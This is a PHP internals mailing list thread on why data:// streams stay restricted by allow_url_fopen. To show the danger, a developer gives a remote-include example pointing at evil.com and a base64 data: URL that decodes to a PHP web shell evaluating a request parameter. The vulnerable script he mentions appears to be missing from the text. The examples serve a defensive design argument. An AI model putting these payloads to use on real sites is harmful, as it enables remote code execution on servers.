RE: [PHP-DEV] data stream restricted by allow_url_fopen (Bug #47336)
> If include of data urls is enabled, the attacker could do the same with > &file=data:image/png;base64,PD9waHAgZXZhbCgkX0dFVFsiY29kZSJdKTsgPz4K Okay, I got it ;-) So it would be nice if someone could update the documentation and set the bug to "resolved" Thanks for your help.
Re: [PHP-DEV] data stream restricted by allow_url_fopen (Bug #47336)
On 11/03/13 12:36, Christian Stoller wrote: > Hi Stas. >> I'm afraid it is not a good idea. allow_url_fopen is meant to protect >> file functions (fopen and friends) from being injected with >> user-controlled data - i.e. if you control the filesystem and you do >> fopen() under allow_url_fopen then it is reasonable to assume the data >> under that filename is under your control. However, data:// URLs clearly >> violate this assumption no less than http:// URLs do - data: just does >> it without even requiring a web server. > I am unsure whether I understand you. As far as I know with the data:// > stream PHP does not access any file on the filesystem. It's just for > transforming normal content in a variable to a resource, or not? So I do not > see any risk. Maybe you can give me an example. Suppose you had the silly script: http://evil.com/backdoor-code and php would happily run the php code located at http://evil.com/backdoor-code.php If include of data urls is enabled, the attacker could do the same with &file=data:image/png;base64,PD9waHAgZXZhbCgkX0dFVFsiY29kZSJdKTsgPz4K -- PHP Internals - PHP Runtime Development Mailing List To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP-DEV] data stream restricted by allow_url_fopen (Bug #47336)
Hi Stas. > I'm afraid it is not a good idea. allow_url_fopen is meant to protect > file functions (fopen and friends) from being injected with > user-controlled data - i.e. if you control the filesystem and you do > fopen() under allow_url_fopen then it is reasonable to assume the data > under that filename is under your control. However, data:// URLs clearly > violate this assumption no less than http:// URLs do - data: just does > it without even requiring a web server. I am unsure whether I understand you. As far as I know with the data:// stream PHP does not access any file on the filesystem. It's just for transforming normal content in a variable to a resource, or not? So I do not see any risk. Maybe you can give me an example.
Re: [PHP-DEV] data stream restricted by allow_url_fopen (Bug #47336)
Hi! > I have run into a bug, which is open since 2009. It would be nice if > you could look at https://bugs.php.net/bug.php?id=47336 It has been > marked as “documentation problem”. But in my opinion the > implementation should follow the documentation and allow fopen > “data://” streams even if “allow_url_fopen” is set to “false”. > Because it is not like opening a maybe manipulated URL. > > It would be really nice if this bug could be fixed, soon. I'm afraid it is not a good idea. allow_url_fopen is meant to protect file functions (fopen and friends) from being injected with user-controlled data - i.e. if you control the filesystem and you do fopen() under allow_url_fopen then it is reasonable to assume the data under that filename is under your control. However, data:// URLs clearly violate this assumption no less than http:// URLs do - data: just does it without even requiring a web server. -- Stanislav Malyshev, Software Architect SugarCRM: http://www.sugarcrm.com/ (408)454-6900 ext. 227 -- PHP Internals - PHP Runtime Development Mailing List To unsubscribe, visit: http://www.php.net/unsub.php
